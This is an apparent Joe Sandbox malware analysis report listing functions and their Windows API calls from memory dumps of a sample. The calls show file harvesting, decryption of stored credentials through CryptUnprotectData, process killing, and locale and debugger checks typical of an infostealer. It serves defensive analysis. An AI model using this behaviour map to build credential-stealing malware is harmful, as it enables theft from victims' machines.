                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat
                                                    • String ID:
                                                    • API String ID: 2276651480-0
                                                    • Opcode ID: 2de634e515e40bf3d02188b1823f2cee3bbfe8e5fb617657e8324fce15409c4d
                                                    • Instruction ID: e8ca15bc756997b6640a1a91c7b65a5ea681972278870628fc0771c1d46fa18d
                                                    • Opcode Fuzzy Hash: 2de634e515e40bf3d02188b1823f2cee3bbfe8e5fb617657e8324fce15409c4d
                                                    • Instruction Fuzzy Hash: 4A815671921295ABDB21FF75CC84A9E7BB6AF44308F04012BEC09A7251D774DD42DF60
                                                    Function 0249E0B7 Relevance: 24.2, APIs: 16, Instructions: 170stringfilememoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0249E0CF
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0249E0D6
                                                    • wsprintfA.USER32 ref: 0249E0EE
                                                    • FindFirstFileA.KERNEL32(?,?), ref: 0249E107
                                                    • StrCmpCA.SHLWAPI(?,00431D70), ref: 0249E125
                                                    • StrCmpCA.SHLWAPI(?,00431D74), ref: 0249E140
                                                    • wsprintfA.USER32 ref: 0249E160
                                                    • DeleteFileA.KERNEL32(?), ref: 0249E1B4
                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0249E17B
                                                      • Part of subcall function 02481677: lstrcpy.KERNEL32(00000000,?), ref: 0248169E
                                                      • Part of subcall function 02481677: lstrcpy.KERNEL32(00000000,?), ref: 024816C0
                                                      • Part of subcall function 02481677: lstrcpy.KERNEL32(00000000,?), ref: 024816E2
                                                      • Part of subcall function 02481677: lstrcpy.KERNEL32(00000000,?), ref: 02481746
                                                      • Part of subcall function 0249DD07: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0249DD62
                                                      • Part of subcall function 0249DD07: lstrcpy.KERNEL32(00000000,?), ref: 0249DD95
                                                      • Part of subcall function 0249DD07: lstrcat.KERNEL32(?,00000000), ref: 0249DDA3
                                                      • Part of subcall function 0249DD07: lstrcat.KERNEL32(?,00638B0C), ref: 0249DDBD
                                                      • Part of subcall function 0249DD07: lstrcat.KERNEL32(?,?), ref: 0249DDD1
                                                      • Part of subcall function 0249DD07: lstrcat.KERNEL32(?,00638DD8), ref: 0249DDE5
                                                      • Part of subcall function 0249DD07: lstrcpy.KERNEL32(00000000,?), ref: 0249DE15
                                                      • Part of subcall function 0249DD07: GetFileAttributesA.KERNEL32(00000000), ref: 0249DE1C
                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0249E1C3
                                                    • FindClose.KERNEL32(00000000), ref: 0249E1D2
                                                    • lstrcat.KERNEL32(?,00638D24), ref: 0249E1F9
                                                    • lstrcat.KERNEL32(?,00638A2C), ref: 0249E20B
                                                    • lstrlen.KERNEL32(?), ref: 0249E216
                                                    • lstrlen.KERNEL32(?), ref: 0249E225
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249E25B
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                                    • String ID:
                                                    • API String ID: 3181694991-0
                                                    • Opcode ID: 2129fdeb310808f6ed0580cd61fd7b9a92f65e13c7ec26af8fe0cdf644d645b5
                                                    • Instruction ID: 82f0e9fb5cefda884324fb78e3920b49fc53ff39db2326cebdbceb400e2e9892
                                                    • Opcode Fuzzy Hash: 2129fdeb310808f6ed0580cd61fd7b9a92f65e13c7ec26af8fe0cdf644d645b5
                                                    • Instruction Fuzzy Hash: 19514E71614380AFC724EF74DC48A9E7BEAAF88315F00492EF99987290EB74D545CF92
                                                    Function 0249D8A7 Relevance: 21.2, APIs: 14, Instructions: 183stringfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • wsprintfA.USER32 ref: 0249D8C4
                                                    • FindFirstFileA.KERNEL32(?,?), ref: 0249D8DB
                                                    • StrCmpCA.SHLWAPI(?,00431D70), ref: 0249D8FB
                                                    • StrCmpCA.SHLWAPI(?,00431D74), ref: 0249D915
                                                    • lstrcat.KERNEL32(?,00638D24), ref: 0249D95A
                                                    • lstrcat.KERNEL32(?,00638BF8), ref: 0249D96E
                                                    • lstrcat.KERNEL32(?,?), ref: 0249D982
                                                    • lstrcat.KERNEL32(?,?), ref: 0249D993
                                                    • lstrcat.KERNEL32(?,00431D64), ref: 0249D9A5
                                                    • lstrcat.KERNEL32(?,?), ref: 0249D9B9
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249D9F9
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249DA49
                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0249DAAE
                                                    • FindClose.KERNEL32(00000000), ref: 0249DABD
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                                    • String ID:
                                                    • API String ID: 50252434-0
                                                    • Opcode ID: e4102dfd33d95e035ea187f5226d1dfd03c7352a26a1a26f08ba0d47fd709faf
                                                    • Instruction ID: 1784398f53f7aa5b8cf7f18fa29fbade04fab2ddfd1e6a5fc5cab88af32c9ac2
                                                    • Opcode Fuzzy Hash: e4102dfd33d95e035ea187f5226d1dfd03c7352a26a1a26f08ba0d47fd709faf
                                                    • Instruction Fuzzy Hash: 65615671D10259AFCF14FF74CC84ADE7BBAAF48304F00459AE949A7250EB74AA55CFA0
                                                    Function 004246C0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004246D9
                                                    • Process32First.KERNEL32(00000000,00000128), ref: 004246E9
                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 004246FB
                                                    • StrCmpCA.SHLWAPI(?,?), ref: 0042470D
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00424722
                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00424731
                                                    • CloseHandle.KERNEL32(00000000), ref: 00424738
                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 00424746
                                                    • CloseHandle.KERNEL32(00000000), ref: 00424751
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                    • String ID:
                                                    • API String ID: 3836391474-0
                                                    • Opcode ID: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
                                                    • Instruction ID: acde96e121e2a7afcea3315a204f3f85e54aecaf4105e29a1c9688e5f6c36e20
                                                    • Opcode Fuzzy Hash: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
                                                    • Instruction Fuzzy Hash: 6301A1316012246BE7205B60AC88FFB777DEB85B81F00109DF90596280EFB499408FB4
                                                    Function 024A2F67 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 024A7477: lstrcpy.KERNEL32(00000000,ERROR), ref: 024A7495
                                                    • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 024A2FA2
                                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 024A2FB4
                                                    • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 024A2FC1
                                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 024A2FF3
                                                    • LocalFree.KERNEL32(00000000), ref: 024A31D1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                    • String ID: /
                                                    • API String ID: 3090951853-4001269591
                                                    • Opcode ID: 7671fc27ad4a2ad92b930ab996fc11a614c7b477747d6adc6e497c6ecca29900
                                                    • Instruction ID: b7f1c8c9bc248a8013e565e5dca05a49fa78fe171051a345386d17ab6826f4b9
                                                    • Opcode Fuzzy Hash: 7671fc27ad4a2ad92b930ab996fc11a614c7b477747d6adc6e497c6ecca29900
                                                    • Instruction Fuzzy Hash: 98B12A71904204CFD715CF54C958B99BBF2BB54329F29C1EAD409AB3A1E7769C82CF90
                                                    Function 0248EFF7 Relevance: 9.1, APIs: 6, Instructions: 96stringencryptionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • memset.MSVCRT ref: 0248F022
                                                    • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0248F03D
                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0248F045
                                                    • memcpy.MSVCRT(?,?,?), ref: 0248F0B8
                                                    • lstrcat.KERNEL32(0042D01C,0042D01C), ref: 0248F0EE
                                                    • lstrcat.KERNEL32(0042D01C,0042D01C), ref: 0248F110
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                    • String ID:
                                                    • API String ID: 1498829745-0
                                                    • Opcode ID: 5fe68cfddfdb507885f88cbc14fa978923ecc3c3b8c5ac6e013f8490b7f9ee3c
                                                    • Instruction ID: fc926c297a50dfa804f170faad698c2d4d4b2ccf3f58e6dc250d7fd4b5a0daad
                                                    • Opcode Fuzzy Hash: 5fe68cfddfdb507885f88cbc14fa978923ecc3c3b8c5ac6e013f8490b7f9ee3c
                                                    • Instruction Fuzzy Hash: C431B275F00219ABDB109B98EC45BEFB779EB44705F04417AFA09E3240DBB49A04CBE5
                                                    Function 024A4897 Relevance: 9.0, APIs: 6, Instructions: 45processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 024A48AF
                                                    • Process32First.KERNEL32(00000000,00000128), ref: 024A48BF
                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 024A48D1
                                                    • StrCmpCA.SHLWAPI(?,00435644), ref: 024A48E7
                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 024A48F9
                                                    • CloseHandle.KERNEL32(00000000), ref: 024A4904
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 2284531361-0
                                                    • Opcode ID: 53f09dbe92254623ecc6bef3730497311d8cee6998608483a313aedc1c667fd6
                                                    • Instruction ID: 0797940001ba2569223e637f26a172c16e44b3ef3ab854b60566f5c9f92789f8
                                                    • Opcode Fuzzy Hash: 53f09dbe92254623ecc6bef3730497311d8cee6998608483a313aedc1c667fd6
                                                    • Instruction Fuzzy Hash: FA014F316012285BE7209B74AC89FEE77ADEF48751F0401DAF908D2150EBB49AA48EE1
                                                    Function 024A2E17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 024A2E49
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 024A2E50
                                                    • GetTimeZoneInformation.KERNEL32(?), ref: 024A2E5F
                                                    • wsprintfA.USER32 ref: 024A2E8A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                                    • String ID: wwww
                                                    • API String ID: 3317088062-671953474
                                                    • Opcode ID: f69004c5f71f610b6d547f6432eddab92af069e70ec5a533afdf3a811bdd1a6c
                                                    • Instruction ID: 21244d80347c35f836a8ffec5671ec2a12afa4c18bcf3d16d9554b2d6d80042a
                                                    • Opcode Fuzzy Hash: f69004c5f71f610b6d547f6432eddab92af069e70ec5a533afdf3a811bdd1a6c
                                                    • Instruction Fuzzy Hash: D201F771A04614ABC7188F58DC4AB6AB76AE784720F10432AFD16D73C0D7B419008AE5
                                                    Function 024A7E31 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32 ref: 024A8699
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 024A86AE
                                                    • UnhandledExceptionFilter.KERNEL32(0042C2C0), ref: 024A86B9
                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 024A86D5
                                                    • TerminateProcess.KERNEL32(00000000), ref: 024A86DC
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                    • String ID:
                                                    • API String ID: 2579439406-0
                                                    • Opcode ID: 6f8c16cd750ee8837aff1e30bd80a1a9b619af74afdd13ae9f3795960fce2a3f
                                                    • Instruction ID: 9b818f1d89edfdadf1d5557fca68222d554db4752980df6714f42190245acb60
                                                    • Opcode Fuzzy Hash: 6f8c16cd750ee8837aff1e30bd80a1a9b619af74afdd13ae9f3795960fce2a3f
                                                    • Instruction Fuzzy Hash: DF21F3B59003069FC760DF15F984A49BBB4FB28304F50603EF51887B61EB7069858F5D
                                                    Function 00407690 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040769E
                                                    • HeapAlloc.KERNEL32(00000000), ref: 004076A5
                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004076CD
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004076ED
                                                    • LocalFree.KERNEL32(?), ref: 004076F7
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                    • String ID:
                                                    • API String ID: 3657800372-0
                                                    • Opcode ID: 409e78fb13d6794445940b5c0aff07b763ad56f8c0cd95c9c67de4eede8e8ce7
                                                    • Instruction ID: fc53f040804026e33a48c705a0d2581fa71e9ff24b93ea351c491559a1666898
                                                    • Opcode Fuzzy Hash: 409e78fb13d6794445940b5c0aff07b763ad56f8c0cd95c9c67de4eede8e8ce7
                                                    • Instruction Fuzzy Hash: 3A011E75B40318BBEB14DBA49C4AFAA7779EB44B15F104159FB09EB2C0D6B0A9008BE4
                                                    Function 024878F7 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 02487905
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0248790C
                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02487934
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 02487954
                                                    • LocalFree.KERNEL32(?), ref: 0248795E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                    • String ID:
                                                    • API String ID: 2609814428-0
                                                    • Opcode ID: 409e78fb13d6794445940b5c0aff07b763ad56f8c0cd95c9c67de4eede8e8ce7
                                                    • Instruction ID: b0e76d362351271e7ccf27a7a883fd60447bc23111212b1f7832957db4cbaee8
                                                    • Opcode Fuzzy Hash: 409e78fb13d6794445940b5c0aff07b763ad56f8c0cd95c9c67de4eede8e8ce7
                                                    • Instruction Fuzzy Hash: 56011275B40318BBEB14DB949C4AFAA7779EB44B15F104159FA05EB2C0D6B099008BE4
                                                    Function 00424090 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 004240AD
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 004240BC
                                                    • HeapAlloc.KERNEL32(00000000,?,?,?), ref: 004240C3
                                                    • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 004240F3
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: BinaryCryptHeapString$AllocProcess
                                                    • String ID:
                                                    • API String ID: 3939037734-0
                                                    • Opcode ID: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
                                                    • Instruction ID: d2b09a1c624c39b133de08918eaa2f92ad29e846d2d732d6bc326f324e173560
                                                    • Opcode Fuzzy Hash: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
                                                    • Instruction Fuzzy Hash: B0011E70600215ABDB149FA5EC85BAB7BADEF85711F108059BE0987340DA7199408BA4
                                                    Function 024A42F7 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 024A4314
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 024A4323
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 024A432A
                                                    • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 024A435A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: BinaryCryptHeapString$AllocateProcess
                                                    • String ID:
                                                    • API String ID: 3825993179-0
                                                    • Opcode ID: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
                                                    • Instruction ID: 8e047da516dfa3c763636f297c0a0133a51c49b84e7bbcfb63a28ba658457a14
                                                    • Opcode Fuzzy Hash: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
                                                    • Instruction Fuzzy Hash: 5E011A70600205ABEB149FA5EC89BABBBADEF95315F104159BD0987340DBB1E9408BA0
                                                    Function 00409BE0 Relevance: 6.0, APIs: 4, Instructions: 43memoryencryptionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409BFF
                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00409C13
                                                    • memcpy.MSVCRT(00000000,?), ref: 00409C2A
                                                    • LocalFree.KERNEL32(?), ref: 00409C37
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                    • String ID:
                                                    • API String ID: 3243516280-0
                                                    • Opcode ID: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
                                                    • Instruction ID: abf8395257343a8b015b9f0b6c8a158c8b551f0c270fe32e84b7b64ff486a2c6
                                                    • Opcode Fuzzy Hash: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
                                                    • Instruction Fuzzy Hash: F701FB75E41309ABE7109BA4DC45BAAB779EB44700F504169FA04AB380DBB09E008BE4
                                                    Function 02489E47 Relevance: 6.0, APIs: 4, Instructions: 43memoryencryptionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 02489E66
                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 02489E7A
                                                    • memcpy.MSVCRT(00000000,?), ref: 02489E91
                                                    • LocalFree.KERNEL32(?), ref: 02489E9E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                    • String ID:
                                                    • API String ID: 3243516280-0
                                                    • Opcode ID: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
